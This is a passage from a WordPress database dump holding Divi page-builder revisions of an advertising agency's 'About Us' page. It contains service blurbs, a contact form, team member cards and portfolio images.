locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-18 11:00:39','2020-08-18 11:00:39','',392,'https://wthtest1.in8.cdn-alpha.com/392-revision-v1/',0,'revision','',0),(764,1,'2020-08-18 11:11:29','2020-08-18 11:11:29','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"4.5.6\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"20px|0px|0px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\" custom_margin_last_edited=\"on|phone\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.6\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" header_font_size_last_edited=\"off|desktop\" locked=\"off\" content_last_edited=\"on|phone\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"9px\" text_font_last_edited=\"on|phone\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" parallax=\"on\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||56px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Shubham Jha\" position=\"Marketing Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.jpg\" facebook_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Sachin\" position=\"Art Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-7.jpg\" facebook_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"56px||56px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" 